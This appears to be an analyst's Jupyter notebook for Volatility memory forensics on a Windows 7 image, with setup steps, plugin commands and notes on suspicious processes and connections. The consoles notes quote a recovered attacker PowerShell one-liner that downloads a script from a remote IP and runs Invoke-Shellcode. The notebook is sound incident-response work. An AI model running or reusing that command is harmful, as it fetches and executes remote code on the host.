# Volatility Memory Analysis

<a id="index"></a>
## Index

[Setup on Kali 2020.2](#setup)

[Global Settings](#globalsettings)

[imageinfo](#imageinfo)

[pslist](#pslist)

[psscan](#psscan)

[pstree](#pstree)

[psxview](#psxview)

[strings](#strings)

[consoles](#consoles)

[netscan](#netscan)

<a id="setup"></a>
## Setup on Kali 2020.2

[Back to Index](#index)

Steps to Install Volatility 
````
sudo apt update

sudo apt install -y python2 python-dev dwarfdump build-essential yara zip

curl https://bootstrap.pypa.io/get-pip.py --output get-pip.py

sudo python2 get-pip.py

sudo pip2 install setuptool pycrypto yara-python distorm3==3.4.4

git clone https://github.com/volatilityfoundation/volatility.git

cd volatility/

sudo python2 setup.py install
````

<a id="globalsettings"></a>
## Global Settings

[Back to Index](#index)

In [ ]:
directory='/home/kali/bhis/mem'
#directory=!pwd
outputDir=directory + "/output"
dumpsDir=directory + "/dumps"
memFile=directory + "/" + "evidence.mem"

!mkdir -p $outputDir
!mkdir -p $dumpsDir

<a id="imageinfo"></a>
## imageinfo

[Back to Index](#index)

In [ ]:
!volatility -f $memFile imageinfo > $outputDir/imageinfo.txt
!cat $outputDir/imageinfo.txt

## Set Suggested Profile from imageinfo results

In [ ]:
# Populate from the suggested profile from above
profile="Win7SP1x86"

<a id="pslist"></a>
## pslist

[Back to Index](#index)

Provide a process list of what was running or had been running when the memory image was taken...

In [ ]:
!volatility --profile=$profile -f $memFile pslist --output-file=$outputDir/pslist.txt
!cat $outputDir/pslist.txt

#### Notes



<a id="psscan"></a>
## psscan

[Back to Index](#index)

Provide a process list based on found structure in memory.  If a process is hidding it will jump out of the flink and bliknk of the norm.

In [ ]:
!volatility --profile=$profile -f $memFile psscan --output-file=$outputDir/psscan.txt
!cat $outputDir/psscan.txt

#### Notes


<a id="pstree"></a>
## pstree

[Back to Index](#index)

In [ ]:
!volatility --profile=$profile -f $memFile pstree --output-file=$outputDir/pstree.txt
!cat $outputDir/pstree.txt

#### Notes

PID 956 explorer.exe to PID 3212 cmd.exe 
3212 powershell.exe Invoke-Shellcode of a powershell script...
0x856f49b8:cmd.exe                                 3212    956      1     21 2017-05-12 14:43:42 UTC+0000

<a id="psxview"></a>
## psxview

[Back to Index](#index)

After the command executes search for processes that have false in the column for pslist and True in psscan.  This would mean that the process is hidding and not in the flink or blink of the process chain.

In [ ]:
!volatility --profile=$profile -f $memFile psxview --output-file=$outputDir/psxview.txt
!cat $outputDir/psxview.txt

#### Notes

0x7db90110 LogonUI.exe            2808 False  True   True     False  False False   False    

0x7f6e3d40 OSPPSVC.EXE             528 False  True   False    False  False False   False    2017-05-12 14:42:50 UTC+0000

0x7db427a0 csrss.exe               552 False  True   True     False  False False   False    

0x7dba4130 SearchProtocol          596 False  True   False    False  False False   False    2017-05-12 14:42:50 UTC+0000

0x7dbb6250 firefox.exe            3660 False  True   False    False  False False   False    2017-05-12 14:42:39 UTC+0000

0x7db684f0 SearchFilterHo         1680 False  True   False    False  False False   False    2017-05-12 14:42:50 UTC+0000

0x7e1de530 ?                         2 False  False  True     False  False False   False    

<a id="strings"></a>
## strings

[Back to Index](#index)

````
Match physical offsets to virtual addresses (may take a while, VERY verbose)
strings -a -td <image> # The -td outputs the decimal offset of the location in the file
strings -a -td -el <image> # The -el goes back for little endian unicode strings
````

In [ ]:
!strings -a -td $memFile > $outputDir/strings.txt
!cat $outputDir/strings.txt

In [ ]:
# Output the strings with Unicode
# This strings fails to write the file...  Command line works great...
!strings -a -td -el $memfile > $outputDir/stringsUnicode.txt
!cat $outputDir/stringsUnicode.txt

<a id="consoles"></a>
## consoles

[Back to Index](#index)

In [ ]:
!volatility --profile=$profile -f $memFile consoles --output-file=$outputDir/consoles.txt
!cat $outputDir/consoles.txt

#### Notes

PID 3212

Cmd #0 at 0x525c8: powershell.exe -nop -exec bypass -Command IEX (New-Object system.Net.WebClient).DownloadString(\"http://107.170.42.241/is2.ps1\");Invoke-Shellcode -F

107.170.42.241 - Initial Payload

<a id="netscan"></a>
## netscan

[Back to Index](#index)

Scans for network connections.  Windows 2008 and 7

In [ ]:
!volatility --profile=$profile -f $memFile netscan --output-file=$outputDir/netscan.txt
!cat $outputDir/netscan.txt

In [ ]:
# Filtering out firefox because it may be common traffic...
!cat $outputDir/netscan.txt | grep -v "firefox.exe"

#### Notes
Odd that explorer is calling outbound
0x7dc00688         TCPv4    192.168.2.163:49309            162.243.44.94:80     ESTABLISHED      956      explorer.exe

** Offset that contains the backdoor...

162.243.44.94 is the IP Address calling outbound that is interesting...
